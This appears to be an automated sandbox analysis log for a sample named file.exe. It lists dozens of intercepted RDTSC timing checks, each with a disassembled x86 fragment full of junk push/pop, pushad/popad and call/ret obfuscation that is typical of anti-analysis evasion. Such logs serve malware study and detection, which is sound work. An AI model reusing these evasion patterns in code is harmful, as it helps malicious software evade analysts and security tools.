Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86381 second address: A86387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8B29F second address: A8B346 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 movsx edi, ax 0x0000000c mov dword ptr [ebp+122D2802h], edx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FDE8C51D4D8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e call 00007FDE8C51D4E9h 0x00000033 sub dword ptr [ebp+122D1DFDh], ecx 0x00000039 pop ebx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007FDE8C51D4D8h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 mov ebx, 4E015CD1h 0x0000005b push eax 0x0000005c pushad 0x0000005d pushad 0x0000005e jns 00007FDE8C51D4D6h 0x00000064 jl 00007FDE8C51D4D6h 0x0000006a popad 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007FDE8C51D4E8h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8D278 second address: A8D299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4CBh 0x00000009 jnp 00007FDE8CE8B4D2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3A521 second address: A3A525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3A525 second address: A3A52F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDE8CE8B4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8D86D second address: A8D8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FDE8C51D4D6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FDE8C51D4D8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FDE8C51D4D8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 push 00000000h 0x00000047 jnl 00007FDE8C51D4DCh 0x0000004d pushad 0x0000004e jmp 00007FDE8C51D4DEh 0x00000053 pushad 0x00000054 sub ecx, dword ptr [ebp+122D2D07h] 0x0000005a jbe 00007FDE8C51D4D6h 0x00000060 popad 0x00000061 popad 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 push edx 0x00000067 pop edx 0x00000068 jno 00007FDE8C51D4D6h 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E8D4 second address: A8E8D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E8D8 second address: A8E8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E8DE second address: A8E951 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FDE8CE8B4D3h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FDE8CE8B4C8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D1F62h] 0x0000002e mov di, ax 0x00000031 push 00000000h 0x00000033 mov edi, 062440A7h 0x00000038 push 00000000h 0x0000003a jnc 00007FDE8CE8B4CCh 0x00000040 xchg eax, esi 0x00000041 jmp 00007FDE8CE8B4D6h 0x00000046 push eax 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a push ecx 0x0000004b pop ecx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8F876 second address: A8F87B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8EABB second address: A8EABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8F87B second address: A8F8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FDE8C51D4D8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 sub ebx, 62742ADEh 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c mov di, bx 0x0000002f jl 00007FDE8C51D4D9h 0x00000035 xchg eax, esi 0x00000036 je 00007FDE8C51D4E2h 0x0000003c jnc 00007FDE8C51D4DCh 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8EB56 second address: A8EB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9371B second address: A937D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FDE8C51D4D8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007FDE8C51D4D8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 0000001Ah 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 mov ebx, edi 0x00000044 sub edi, dword ptr [ebp+122D28CCh] 0x0000004a push 00000000h 0x0000004c mov di, 18ECh 0x00000050 call 00007FDE8C51D4E7h 0x00000055 add ebx, dword ptr [ebp+122D2C6Bh] 0x0000005b pop ebx 0x0000005c xchg eax, esi 0x0000005d pushad 0x0000005e push edi 0x0000005f jmp 00007FDE8C51D4DFh 0x00000064 pop edi 0x00000065 jmp 00007FDE8C51D4DCh 0x0000006a popad 0x0000006b push eax 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f push ebx 0x00000070 pop ebx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A946B5 second address: A946BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A946BC second address: A94756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FDE8C51D4D8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 jmp 00007FDE8C51D4E8h 0x00000029 jmp 00007FDE8C51D4E7h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007FDE8C51D4D8h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a jmp 00007FDE8C51D4DCh 0x0000004f push 00000000h 0x00000051 or dword ptr [ebp+122D226Ch], eax 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push edi 0x0000005b push ebx 0x0000005c pop ebx 0x0000005d pop edi 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A94756 second address: A94760 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDE8CE8B4CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A957B1 second address: A957C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FDE8C51D4D6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9DD3B second address: A9DD41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9D47E second address: A9D4D2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDE8C51D4EFh 0x00000008 pushad 0x00000009 js 00007FDE8C51D4D6h 0x0000000f jmp 00007FDE8C51D4E5h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FDE8C51D4E2h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9D4D2 second address: A9D4D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9D66D second address: A9D69F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FDE8C51D4E8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9D69F second address: A9D6A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9FF00 second address: A9FF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA155D second address: AA1561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1561 second address: AA1575 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDE8C51D4D8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FDE8C51D4D6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1575 second address: AA1584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1584 second address: AA1592 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1592 second address: AA1596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1596 second address: AA15B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9390B second address: A93910 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A959B2 second address: A959BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6981 second address: AA699B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jns 00007FDE8CE8B4C8h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007FDE8CE8B4C8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6A72 second address: AA6A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6B5E second address: AA6B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007FDE8CE8B4D1h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6B81 second address: AA6B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8C51D4DAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6B90 second address: AA6B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6B9F second address: AA6BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6BA3 second address: AA6BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDE8CE8B4CBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6BBA second address: AA6BBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6BBF second address: AA6BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6C84 second address: AA6C92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6C92 second address: 8CEC37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnp 00007FDE8CE8B4C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 38407B17h 0x00000015 pushad 0x00000016 sbb eax, 17023EB2h 0x0000001c push edx 0x0000001d push edx 0x0000001e pop eax 0x0000001f pop edi 0x00000020 popad 0x00000021 push dword ptr [ebp+122D021Dh] 0x00000027 jmp 00007FDE8CE8B4D1h 0x0000002c call dword ptr [ebp+122D1DD7h] 0x00000032 pushad 0x00000033 jnp 00007FDE8CE8B4C7h 0x00000039 xor eax, eax 0x0000003b pushad 0x0000003c xor dword ptr [ebp+122D1CC9h], ecx 0x00000042 popad 0x00000043 mov edx, dword ptr [esp+28h] 0x00000047 jne 00007FDE8CE8B4D4h 0x0000004d mov dword ptr [ebp+122D2BBBh], eax 0x00000053 clc 0x00000054 mov esi, 0000003Ch 0x00000059 mov dword ptr [ebp+122D1D82h], esi 0x0000005f mov dword ptr [ebp+122D1CC9h], esi 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 xor dword ptr [ebp+122D1D82h], edi 0x0000006f lodsw 0x00000071 cmc 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 mov dword ptr [ebp+122D1D82h], edx 0x0000007c mov dword ptr [ebp+122D1CC9h], eax 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 jmp 00007FDE8CE8B4D4h 0x0000008b push eax 0x0000008c push eax 0x0000008d push eax 0x0000008e push edx 0x0000008f pushad 0x00000090 popad 0x00000091 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAB5E8 second address: AAB5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42C07 second address: A42C1C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDE8CE8B4C6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42C1C second address: A42C39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDE8C51D4E1h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAA36E second address: AAA38F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FDE8CE8B4C6h 0x0000000a pop ebx 0x0000000b jns 00007FDE8CE8B4CCh 0x00000011 popad 0x00000012 pushad 0x00000013 jg 00007FDE8CE8B4CEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAA38F second address: AAA399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAA399 second address: AAA3B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4D3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAA3B0 second address: AAA3B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAA935 second address: AAA93F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDE8CE8B4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAAE7F second address: AAAE86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAAE86 second address: AAAE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAAE93 second address: AAAE9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FDE8C51D4D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAAE9F second address: AAAEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAAEA5 second address: AAAEAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAAEAA second address: AAAEB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAAEB0 second address: AAAEB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAB15E second address: AAB16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FDE8CE8B4D2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAB16E second address: AAB178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FDE8C51D4D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAB178 second address: AAB1B2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDE8CE8B4F5h 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAB316 second address: AAB32A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FDE8C51D4D6h 0x0000000e ja 00007FDE8C51D4D6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF708 second address: AAF70E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF70E second address: AAF712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF712 second address: AAF725 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF725 second address: AAF74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FDE8C51D4EFh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF74A second address: AAF769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4D5h 0x00000009 je 00007FDE8CE8B4C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF8EC second address: AAF91F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDE8C51D4E6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FDE8C51D4E3h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAFA7C second address: AAFA82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAFA82 second address: AAFAB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDE8C51D4DDh 0x0000000b push edi 0x0000000c jmp 00007FDE8C51D4DCh 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FDE8C51D4E2h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB0158 second address: AB0161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB0161 second address: AB0165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB0569 second address: AB056D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB056D second address: AB0573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB0573 second address: AB0579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB0579 second address: AB059D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FDE8C51D4DCh 0x00000008 js 00007FDE8C51D4D6h 0x0000000e pop esi 0x0000000f jl 00007FDE8C51D4E2h 0x00000015 jg 00007FDE8C51D4D6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB0729 second address: AB0746 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D3h 0x00000007 jp 00007FDE8CE8B4C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
